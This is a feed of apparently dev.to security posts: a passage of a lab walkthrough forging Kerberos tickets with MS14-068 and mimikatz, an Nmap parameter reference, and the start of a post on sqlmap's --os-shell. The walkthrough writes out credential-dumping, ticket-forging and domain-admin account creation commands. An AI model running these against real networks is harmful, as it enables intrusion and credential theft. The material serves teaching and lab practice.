&lt;p&gt;After logging in as &lt;code&gt;Hellen&lt;/code&gt;, &lt;code&gt;whoami&lt;/code&gt; confirms the user context.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0iwiprewrle71spfc8m5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F0iwiprewrle71spfc8m5.png" alt=" " width="663" height="143"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The presence of the MS14‑068 vulnerability is verified.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbnarwtykc58pb3nnp3r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flbnarwtykc58pb3nnp3r.png" alt=" " width="385" height="57"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Access to the administrative share is initially denied.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy1qugmrm1xqo1gx93bn1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fy1qugmrm1xqo1gx93bn1.png" alt=" " width="366" height="41"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The exploit tool and mimikatz are uploaded, and the user’s SID is retrieved.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fymlbh63by3een5guzmxe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fymlbh63by3een5guzmxe.png" alt=" " width="554" height="99"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A ticket is forged with MS14‑068:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;MS14&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;.exe &lt;span class="na"&gt;-u &lt;/span&gt;&lt;span class="kd"&gt;Hellen&lt;/span&gt;@cyberpeace.com &lt;span class="na"&gt;-p &lt;/span&gt;&lt;span class="kd"&gt;Hellen1818&lt;/span&gt; &lt;span class="na"&gt;-s &lt;/span&gt;&lt;span class="kd"&gt;S&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;5&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;21&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;2718660907&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;658632824&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;2072795563&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;1110&lt;/span&gt; &lt;span class="na"&gt;-d &lt;/span&gt;&lt;span class="kd"&gt;DomainControl&lt;/span&gt;.cyberpeace.com
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The generic syntax is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;ms14&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="m"&gt;068&lt;/span&gt;.exe &lt;span class="na"&gt;-u &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;domain_user&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;@&amp;lt;domain&amp;gt; &lt;span class="na"&gt;-p &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;password&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="na"&gt;-s &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;user_SID&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="na"&gt;-d &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="kd"&gt;domain_controller&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Inside mimikatz, the old tickets are purged and the forged ticket is imported:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::purge&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c"&gt;# kerberos::ptc &amp;lt;path_to_ticket_file&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8g0hmbz2vefi1qkev9mk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8g0hmbz2vefi1qkev9mk.png" alt=" " width="639" height="287"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; now succeeds, indicating domain administrator privileges.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw4964pc6l8w0c4z88g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhpw4964pc6l8w0c4z88g.png" alt=" " width="486" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A domain administrator account &lt;code&gt;ccc&lt;/code&gt; is created:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;net user ccc Qwe1234 /add /domain
net group &lt;span class="s2"&gt;"Domain Admins"&lt;/span&gt; cccc /add /domain
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhuz1c8s0rdu8o4ce7mq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdhuz1c8s0rdu8o4ce7mq.png" alt=" " width="637" height="138"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  2. Forging a Silver Ticket
&lt;/h4&gt;

&lt;p&gt;Logging in as the newly created domain administrator, mimikatz is run with administrator privileges to extract the necessary SID and NTLM hash:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;mimikatz&lt;/span&gt;&lt;span class="err"&gt;.exe&lt;/span&gt; &lt;span class="s2"&gt;"privilege::debug"&lt;/span&gt; &lt;span class="s2"&gt;"sekurlsa::logonpasswords"&lt;/span&gt; &lt;span class="s2"&gt;"exit"&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="kd"&gt;log&lt;/span&gt;.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh08cpw0rfcsasrnko1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5rh08cpw0rfcsasrnko1.png" alt=" " width="595" height="372"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The hash and mimikatz are then copied to a local account on a domain‑joined machine. After purging the existing ticket cache, the silver ticket is forged and passed directly into the session using the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kerberos::golden /domain:cyberpeace.com /sid:S-1-5-21-2718660907-658632824-2072795563 /target:scene.cyberpeace.com /service:cifs /rc4:9a68826fdc2811f20d1f73a471ad7b9a /user:test /ptt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The general usage pattern is:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;kerberos::golden&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/domain:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;domain&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/sid:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;domain_SID&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/target:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;target_server&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/service:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;service_type&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/rc4:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;NTLM_hash&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/user:&lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;/ptt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;&amp;lt;username&amp;gt;&lt;/code&gt; may be chosen arbitrarily.&lt;/p&gt;

&lt;p&gt;Since no TGT is available to repeatedly request tickets, the attacker must target a specific service. The service type can be selected from the list below.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F72p168t65c598tn7k30b.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F72p168t65c598tn7k30b.png" alt=" " width="623" height="313"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmweggbpsr7rdbwt5dia.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpmweggbpsr7rdbwt5dia.png" alt=" " width="637" height="398"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The command &lt;code&gt;dir \\scene.cyberpeace.com\c$&lt;/code&gt; executes successfully, and a domain administrator account can be created.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9hdr2mye089z7fulr0ax.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9hdr2mye089z7fulr0ax.png" alt=" " width="641" height="343"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Differences between Golden and Silver Tickets
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Scope of Access
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket&lt;/strong&gt;: Forges a TGT, thereby granting access to any Kerberos‑protected service.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Silver Ticket&lt;/strong&gt;: Forges an ST, granting access only to the specific service for which it was crafted (e.g., CIFS).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Authentication Flow
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket&lt;/strong&gt;: Interacts with the KDC but does not interact with the AS.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Silver Ticket&lt;/strong&gt;: Does not interact with the KDC at all; it communicates directly with the target server.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Encryption Mechanism
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Golden Ticket&lt;/strong&gt;: Encrypted with the NTLM hash of &lt;code&gt;krbtgt&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Silver Ticket&lt;/strong&gt;: Encrypted with the NTLM hash of the service account associated with the target server.&lt;/li&gt;
&lt;/ul&gt;




</description>
      <category>ticket</category>
      <category>passing</category>
      <category>attacks</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Common Nmap Parameters</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Tue, 09 Jun 2026 23:21:22 +0000</pubDate>
      <link>https://dev.to/excalibra/common-nmap-parameters-1815</link>
      <guid>https://dev.to/excalibra/common-nmap-parameters-1815</guid>
      <description>&lt;p&gt;The following table lists frequently used Nmap parameters along with their descriptions in an academic context.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sT&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TCP connect() scan. This method records a large number of connection requests and error messages in the target host’s logs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Half-open scan. Few systems log this activity; however, root privileges are required.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;-sF&lt;/code&gt;, &lt;code&gt;-sN&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Stealth FIN packet scan, Xmas Tree scan, and Null scan modes.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sP&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Ping scan. Nmap employs a ping scan by default when scanning ports; only if the host is alive will Nmap continue scanning.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sU&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;UDP scan. UDP scans are inherently unreliable.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sA&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;This advanced scanning method is typically used to traverse firewall rule sets.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-sV&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Probe port service versions.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-Pn&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Ping is not required prior to scanning. Some firewalls block ping commands; this option can be used to bypass that restriction.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-v&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Display the scanning process. Recommended for verbose output.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-h&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Help option. Provides the clearest and most comprehensive help documentation.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-p&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Specify ports, for example: &lt;code&gt;1-65535&lt;/code&gt;, &lt;code&gt;1433&lt;/code&gt;, &lt;code&gt;135&lt;/code&gt;, &lt;code&gt;22&lt;/code&gt;, &lt;code&gt;80&lt;/code&gt;, etc.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-O&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Enable remote operating system detection. False positives may occur.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-A&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Comprehensive system detection, enabling script detection and advanced scanning.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;code&gt;-oN&lt;/code&gt; / &lt;code&gt;-oX&lt;/code&gt; / &lt;code&gt;-oG&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Write the report to a file in three respective formats: normal, XML, and grepable.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-T4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;For TCP ports, disable dynamic scan delays exceeding 10 ms.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;-iL&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Read a list of hosts from a file, for example: &lt;code&gt;-iL C:\ip.txt&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  Practical Examples
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan open ports on a specified IP address:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -sS -p 1-65535 -v XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan live hosts in a /24 subnet:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -sP XXX.XXX.XXX.XXX/24&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan specific ports:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -p 80,1433,22,1521 XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Detect the host operating system:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -O XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Comprehensive system detection:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -v -A XXX.XXX.XXX.XXX&lt;/code&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;Note: By default, Nmap scans 1,000 high-risk ports.&lt;/em&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Scan a specified IP range:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap XXX.XXX.XXX.XXX-XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Penetrate a firewall for scanning (when ping is blocked):&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -Pn -A XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Use a script to scan web‑sensitive directories:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;code&gt;nmap -p 80 --script=http-enum.nse XXX.XXX.XXX.XXX&lt;/code&gt;&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>nmap</category>
      <category>cybersecurity</category>
      <category>parameters</category>
      <category>common</category>
    </item>
    <item>
      <title>The Principle of sqlmap’s `--os-shell</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Tue, 09 Jun 2026 22:22:33 +0000</pubDate>
      <link>https://dev.to/excalibra/the-principle-of-sqlmaps-os-shell-3mb4</link>
      <guid>https://dev.to/excalibra/the-principle-of-sqlmaps-os-shell-3mb4</guid>
      <description>&lt;h2&gt;
  
  
  Preface
&lt;/h2&gt;

&lt;p&gt;When the database is MySQL, PostgreSQL, or Microsoft SQL Server, and the current user possesses the privileges required to invoke specific functions, sqlmap can be used to obtain an operating system shell.&lt;/p&gt;

&lt;p&gt;In the case of MySQL and PostgreSQL, sqlmap uploads a binary library containing user-defined functions, &lt;code&gt;sys_exec()&lt;/code&gt; and &lt;code&gt;sys_eval()&lt;/code&gt;. These two functions, once created, are capable of executing system commands.&lt;/p&gt;

&lt;p&gt;For Microsoft SQL Server, sqlmap employs the &lt;code&gt;xp_cmdshell&lt;/code&gt; stored procedure. If this procedure is disabled (it is disabled by default in Microsoft SQL Server 2005 and later), sqlmap will attempt to re‑enable it; if it does not exist, sqlmap will create it automatically.&lt;/p&gt;

&lt;p&gt;The following sections illustrate the principles behind the &lt;code&gt;--os-shell&lt;/code&gt; feature by examining injection scenarios and direct database connections for SQL Server and MySQL.&lt;/p&gt;




&lt;h2&gt;
  
  
  Injection-Based &lt;code&gt;--os-shell&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Prerequisites:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Write access to the web server’s document root.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;secure_file_priv&lt;/code&gt; variable is either empty or set to a writable path.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;During a standard SQL injection, &lt;code&gt;--os-shell&lt;/code&gt; operates primarily by uploading a sqlmap trojan, which is subsequently used to execute commands.&lt;/p&gt;




&lt;h3&gt;
  
  
  Test Environment
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Operating system: Microsoft Windows Server 2012 Standard
&lt;/li&gt;
&lt;li&gt;Database: MySQL 5.1.60
&lt;/li&gt;
&lt;li&gt;Scripting language: PHP 5.4.45
&lt;/li&gt;
&lt;li&gt;Web server: Apache 2.4.39
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Initially, sqlmap is employed to detect the injection point.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhiz1r6uvb419gmx4ren8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhiz1r6uvb419gmx4ren8.png" alt=" " width="799" height="273"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;--os-shell&lt;/code&gt; flag is then invoked.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj5ohdhk9puufxjb1sc0q.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj5ohdhk9puufxjb1sc0q.png" alt=" " width="799" height="250"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;At this stage, sqlmap performs three key actions:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Probes the target to gather basic information.
&lt;/li&gt;
&lt;li&gt;Uploads a shell to the target web server.
&lt;/li&gt;
&lt;li&gt;Removes the shell upon exiting.&lt;/li&gt;
&lt;/ol&gt;




&lt;p&gt;A packet capture with Wireshark, filtered to display only HTTP traffic, reveals the sequence.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxd76v3exle17w29rpsz3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxd76v3exle17w29rpsz3.png" alt=" " width="799" height="179"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1 – sqlmap uploads a trojan that provides file‑upload functionality.&lt;/strong&gt;&lt;/p&gt;

